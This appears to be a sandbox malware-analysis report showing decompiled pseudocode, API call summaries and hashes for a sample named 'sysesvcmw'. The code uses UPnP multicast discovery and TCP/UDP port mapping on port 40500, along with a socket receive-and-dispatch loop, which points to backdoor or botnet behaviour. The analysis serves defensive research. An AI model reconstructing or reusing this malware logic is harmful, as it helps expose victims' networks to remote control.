                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                                                                    						_push(_v32);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                                    							_push( &_v36);
                                                                                                                                                                                                                                                                                    							_push(_v16);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                                    								if(_v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    									_push( &_v12);
                                                                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                                                                                                                                                                                                                    										_push( &_v24);
                                                                                                                                                                                                                                                                                    										_push(_a4);
                                                                                                                                                                                                                                                                                    										_push(_v12);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                                                                                                                                                                                                                    											_t110 = E004058C0(0x4120f4, 0x412104);
                                                                                                                                                                                                                                                                                    											_t199 = _t200 + 8;
                                                                                                                                                                                                                                                                                    											_v24 = _t110;
                                                                                                                                                                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    												__imp__#2(L"Microsoft Corporation");
                                                                                                                                                                                                                                                                                    												_v8 = _t110;
                                                                                                                                                                                                                                                                                    												if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    													_push(_v8);
                                                                                                                                                                                                                                                                                    													_push(_v24);
                                                                                                                                                                                                                                                                                    													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                                    														_push(_a4);
                                                                                                                                                                                                                                                                                    														_push(_v24);
                                                                                                                                                                                                                                                                                    														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                                                                                                                                                                                                                    															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    															if(_t118 == 0) {
                                                                                                                                                                                                                                                                                    																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                                                                                                                                                                                                                    																_t118 = 0;
                                                                                                                                                                                                                                                                                    																if(0 != 0) {
                                                                                                                                                                                                                                                                                    																	continue;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																L34:
                                                                                                                                                                                                                                                                                    																if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 = E00408C70(_v20);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    																	__imp__#6(_v8);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    																	return _t118;
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    															goto L34;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    														goto L34;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    													goto L34;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L34;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L34;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                                                                                                                                                                                                                    										if(_t118 == 0) {
                                                                                                                                                                                                                                                                                    											if(_v36 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v40 = 0;
                                                                                                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                                                                                                                                                                                                                    												if(_t118 == 0 && _v40 != 0) {
                                                                                                                                                                                                                                                                                    													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L34;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L34;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L34;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                                                                                                    0x0040591d
                                                                                                                                                                                                                                                                                    0x00405924
                                                                                                                                                                                                                                                                                    0x0040592b
                                                                                                                                                                                                                                                                                    0x00405932
                                                                                                                                                                                                                                                                                    0x00405939
                                                                                                                                                                                                                                                                                    0x00405940
                                                                                                                                                                                                                                                                                    0x00405947
                                                                                                                                                                                                                                                                                    0x00405951
                                                                                                                                                                                                                                                                                    0x00405956
                                                                                                                                                                                                                                                                                    0x00405959
                                                                                                                                                                                                                                                                                    0x00405960
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040596a
                                                                                                                                                                                                                                                                                    0x00405973
                                                                                                                                                                                                                                                                                    0x0040597b
                                                                                                                                                                                                                                                                                    0x00405985
                                                                                                                                                                                                                                                                                    0x0040598e
                                                                                                                                                                                                                                                                                    0x00405996
                                                                                                                                                                                                                                                                                    0x004059a0
                                                                                                                                                                                                                                                                                    0x004059a9
                                                                                                                                                                                                                                                                                    0x004059b1
                                                                                                                                                                                                                                                                                    0x004059bf
                                                                                                                                                                                                                                                                                    0x004059c9
                                                                                                                                                                                                                                                                                    0x004059d2
                                                                                                                                                                                                                                                                                    0x004059da
                                                                                                                                                                                                                                                                                    0x004059e4
                                                                                                                                                                                                                                                                                    0x004059e8
                                                                                                                                                                                                                                                                                    0x004059f1
                                                                                                                                                                                                                                                                                    0x004059f9
                                                                                                                                                                                                                                                                                    0x00405a83
                                                                                                                                                                                                                                                                                    0x00405a88
                                                                                                                                                                                                                                                                                    0x00405a8b
                                                                                                                                                                                                                                                                                    0x00405a92
                                                                                                                                                                                                                                                                                    0x00405a9b
                                                                                                                                                                                                                                                                                    0x00405aa1
                                                                                                                                                                                                                                                                                    0x00405aa8
                                                                                                                                                                                                                                                                                    0x00405aaf
                                                                                                                                                                                                                                                                                    0x00405ab8
                                                                                                                                                                                                                                                                                    0x00405ac0
                                                                                                                                                                                                                                                                                    0x00405ac7
                                                                                                                                                                                                                                                                                    0x00405ad0
                                                                                                                                                                                                                                                                                    0x00405ad8
                                                                                                                                                                                                                                                                                    0x00405aea
                                                                                                                                                                                                                                                                                    0x00405aee
                                                                                                                                                                                                                                                                                    0x00405b02
                                                                                                                                                                                                                                                                                    0x00405b04
                                                                                                                                                                                                                                                                                    0x00405b06
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405b0c
                                                                                                                                                                                                                                                                                    0x00405b10
                                                                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                                                                    0x00405b1b
                                                                                                                                                                                                                                                                                    0x00405b22
                                                                                                                                                                                                                                                                                    0x00405b28
                                                                                                                                                                                                                                                                                    0x00405b28
                                                                                                                                                                                                                                                                                    0x00405b32
                                                                                                                                                                                                                                                                                    0x00405b40
                                                                                                                                                                                                                                                                                    0x00405b40
                                                                                                                                                                                                                                                                                    0x00405b46
                                                                                                                                                                                                                                                                                    0x00405b54
                                                                                                                                                                                                                                                                                    0x00405b54
                                                                                                                                                                                                                                                                                    0x00405b5a
                                                                                                                                                                                                                                                                                    0x00405b68
                                                                                                                                                                                                                                                                                    0x00405b68
                                                                                                                                                                                                                                                                                    0x00405b6e
                                                                                                                                                                                                                                                                                    0x00405b7c
                                                                                                                                                                                                                                                                                    0x00405b7c
                                                                                                                                                                                                                                                                                    0x00405b82
                                                                                                                                                                                                                                                                                    0x00405b95
                                                                                                                                                                                                                                                                                    0x00405b84
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405b90
                                                                                                                                                                                                                                                                                    0x00405b82
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405af0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ada
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ac2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405aaa
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405a94
                                                                                                                                                                                                                                                                                    0x00405a0b
                                                                                                                                                                                                                                                                                    0x00405a0f
                                                                                                                                                                                                                                                                                    0x00405a1d
                                                                                                                                                                                                                                                                                    0x00405a62
                                                                                                                                                                                                                                                                                    0x00405a72
                                                                                                                                                                                                                                                                                    0x00405a1f
                                                                                                                                                                                                                                                                                    0x00405a1f
                                                                                                                                                                                                                                                                                    0x00405a36
                                                                                                                                                                                                                                                                                    0x00405a3a
                                                                                                                                                                                                                                                                                    0x00405a50
                                                                                                                                                                                                                                                                                    0x00405a50
                                                                                                                                                                                                                                                                                    0x00405a52
                                                                                                                                                                                                                                                                                    0x00405a74
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405a0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059dc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059c1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405998
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004058C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004058E0
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                                                    • Opcode ID: 5101201dcff8a4348e4f4b8b21c8e9287c00567db6cdf25e3dc099c263020228
                                                                                                                                                                                                                                                                                    • Instruction ID: b966d8a815279bea9682a753b9e4a3ce538f0dcc0c86578e863b9189ac0295eb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5101201dcff8a4348e4f4b8b21c8e9287c00567db6cdf25e3dc099c263020228
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1691BA75A0050ADFCB04DB98C994EAFB7B5EF88304F208269E515B73A0D778AE41CF65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040D020() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				__imp__CoInitializeEx(0, 2); // executed
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t20 = E0040C580( &_v12,  &_v12); // executed
                                                                                                                                                                                                                                                                                    				_t37 = _t36 + 4;
                                                                                                                                                                                                                                                                                    				_v8 = _t20;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_t20 = E0040CC30( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                                                                                                                                                                                                                    						_t37 = _t37 + 4;
                                                                                                                                                                                                                                                                                    						 *0x416e24 = _t20;
                                                                                                                                                                                                                                                                                    						if( *0x416e24 == 0) {
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v20 = E00409540();
                                                                                                                                                                                                                                                                                    						_t31 =  *0x416e24; // 0x0
                                                                                                                                                                                                                                                                                    						E0040CFA0(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                                    						_t26 =  *0x416e24; // 0x0
                                                                                                                                                                                                                                                                                    						_t20 = E0040CFA0(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                                    						_t37 = _t37 + 0x20;
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return E00408D90(_t20, _v8, _v12, _v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040d02a
                                                                                                                                                                                                                                                                                    0x0040d030
                                                                                                                                                                                                                                                                                    0x0040d03b
                                                                                                                                                                                                                                                                                    0x0040d040
                                                                                                                                                                                                                                                                                    0x0040d043
                                                                                                                                                                                                                                                                                    0x0040d04a
                                                                                                                                                                                                                                                                                    0x0040d050
                                                                                                                                                                                                                                                                                    0x0040d062
                                                                                                                                                                                                                                                                                    0x0040d074
                                                                                                                                                                                                                                                                                    0x0040d079
                                                                                                                                                                                                                                                                                    0x0040d07c
                                                                                                                                                                                                                                                                                    0x0040d088
                                                                                                                                                                                                                                                                                    0x0040d05f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d05f
                                                                                                                                                                                                                                                                                    0x0040d08f
                                                                                                                                                                                                                                                                                    0x0040d0a0
                                                                                                                                                                                                                                                                                    0x0040d0a7
                                                                                                                                                                                                                                                                                    0x0040d0bd
                                                                                                                                                                                                                                                                                    0x0040d0c3
                                                                                                                                                                                                                                                                                    0x0040d0c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d0c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d0dc
                                                                                                                                                                                                                                                                                    0x0040d0e2

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 0040D02A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: socket.WS2_32(00000002,00000002,00000011), ref: 0040C59A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: htons.WS2_32(0000076C), ref: 0040C5D0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: inet_addr.WS2_32(239.255.255.250), ref: 0040C5DF
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C5FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: bind.WS2_32(000000FF,?,00000010), ref: 0040C633
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: lstrlenA.KERNEL32(00410578,00000000,?,00000010), ref: 0040C64C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: sendto.WS2_32(000000FF,00410578,00000000), ref: 0040C65B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C675
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC30: SysFreeString.OLEAUT32(00000000), ref: 0040CD0B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC30: SysFreeString.OLEAUT32(00000000), ref: 0040CD15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                                                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                                                    • Opcode ID: 014f018b2ad0d604453ca6d4d42fb9b10cc54ad83f4ff0cd62ecb7ebe3116a6f
                                                                                                                                                                                                                                                                                    • Instruction ID: d6482cf8f8518ba90fc7d027882e0c52926dc77542800e56e9404f82e9eb0b53
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014f018b2ad0d604453ca6d4d42fb9b10cc54ad83f4ff0cd62ecb7ebe3116a6f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E811E4B4D01208EBD700EFE4EC45BAE7775AB04308F10866EE505772C2E679AE45CB5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                    			E0040B700(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				signed char _t43;
                                                                                                                                                                                                                                                                                    				signed char _t48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                                                                    				signed char _t53;
                                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(InterlockedExchangeAdd(_a4, 0) == 0) {
                                                                                                                                                                                                                                                                                    					_v5 = 0;
                                                                                                                                                                                                                                                                                    					_t38 = E0040B610(_t37, _a4[1]); // executed
                                                                                                                                                                                                                                                                                    					_t81 = _t80 + 4;
                                                                                                                                                                                                                                                                                    					_v12 = _t38;
                                                                                                                                                                                                                                                                                    					if(_v12 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						return _v5;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InterlockedIncrement(_a4);
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						_t72 =  *0x416e14; // 0x2640ab6
                                                                                                                                                                                                                                                                                    						_t43 = E0040A0B0(_v12, 0, _t72, 0, _a8, E0040B4E0, 0); // executed
                                                                                                                                                                                                                                                                                    						_t81 = _t81 + 0x1c;
                                                                                                                                                                                                                                                                                    						_t63 = _t43 & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if((_t43 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v13 = 1;
                                                                                                                                                                                                                                                                                    						while((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    							_v13 = 0;
                                                                                                                                                                                                                                                                                    							_t48 = E0040B540(_v12,  &_v20, 4, 0x2710); // executed
                                                                                                                                                                                                                                                                                    							_t81 = _t81 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_t48 & 0x000000ff) == 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t49 = E00408B20(_v20);
                                                                                                                                                                                                                                                                                    								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    								_v24 = _t49;
                                                                                                                                                                                                                                                                                    								if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    									_t53 = E0040B540(_v12, _v24, _v20, E0040B6A0(_v20)); // executed
                                                                                                                                                                                                                                                                                    									_t84 = _t81 + 0x14;
                                                                                                                                                                                                                                                                                    									if((_t53 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    										E0040A210(_v12, _v24, _v20, _a4[1], E0040B4E0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    										_t84 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                                    										_v13 = 1;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									E00408C70(_v24);
                                                                                                                                                                                                                                                                                    									_t81 = _t84 + 4;
                                                                                                                                                                                                                                                                                    									goto L15;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                                                    						if(0 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                                                    						InterlockedDecrement(_a4);
                                                                                                                                                                                                                                                                                    						E00409600(_v12); // executed
                                                                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E004094E0(_t63, _a4[1]);
                                                                                                                                                                                                                                                                                    					_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x0040b714
                                                                                                                                                                                                                                                                                    0x0040b71d
                                                                                                                                                                                                                                                                                    0x0040b728
                                                                                                                                                                                                                                                                                    0x0040b72d
                                                                                                                                                                                                                                                                                    0x0040b730
                                                                                                                                                                                                                                                                                    0x0040b737
                                                                                                                                                                                                                                                                                    0x0040b856
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b856
                                                                                                                                                                                                                                                                                    0x0040b741
                                                                                                                                                                                                                                                                                    0x0040b747
                                                                                                                                                                                                                                                                                    0x0040b754
                                                                                                                                                                                                                                                                                    0x0040b761
                                                                                                                                                                                                                                                                                    0x0040b766
                                                                                                                                                                                                                                                                                    0x0040b769
                                                                                                                                                                                                                                                                                    0x0040b76e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b784
                                                                                                                                                                                                                                                                                    0x0040b788
                                                                                                                                                                                                                                                                                    0x0040b794
                                                                                                                                                                                                                                                                                    0x0040b7a7
                                                                                                                                                                                                                                                                                    0x0040b7ac
                                                                                                                                                                                                                                                                                    0x0040b7b4
                                                                                                                                                                                                                                                                                    0x0040b82f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b7bc
                                                                                                                                                                                                                                                                                    0x0040b7c0
                                                                                                                                                                                                                                                                                    0x0040b7c5
                                                                                                                                                                                                                                                                                    0x0040b7c8
                                                                                                                                                                                                                                                                                    0x0040b7cf
                                                                                                                                                                                                                                                                                    0x0040b7ec
                                                                                                                                                                                                                                                                                    0x0040b7f1
                                                                                                                                                                                                                                                                                    0x0040b7f9
                                                                                                                                                                                                                                                                                    0x0040b817
                                                                                                                                                                                                                                                                                    0x0040b81c
                                                                                                                                                                                                                                                                                    0x0040b81f
                                                                                                                                                                                                                                                                                    0x0040b81f
                                                                                                                                                                                                                                                                                    0x0040b827
                                                                                                                                                                                                                                                                                    0x0040b82c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b82c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b7d1
                                                                                                                                                                                                                                                                                    0x0040b7b4
                                                                                                                                                                                                                                                                                    0x0040b834
                                                                                                                                                                                                                                                                                    0x0040b83a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b840
                                                                                                                                                                                                                                                                                    0x0040b844
                                                                                                                                                                                                                                                                                    0x0040b84e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b853
                                                                                                                                                                                                                                                                                    0x0040b777
                                                                                                                                                                                                                                                                                    0x0040b77c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b77c
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040B70C
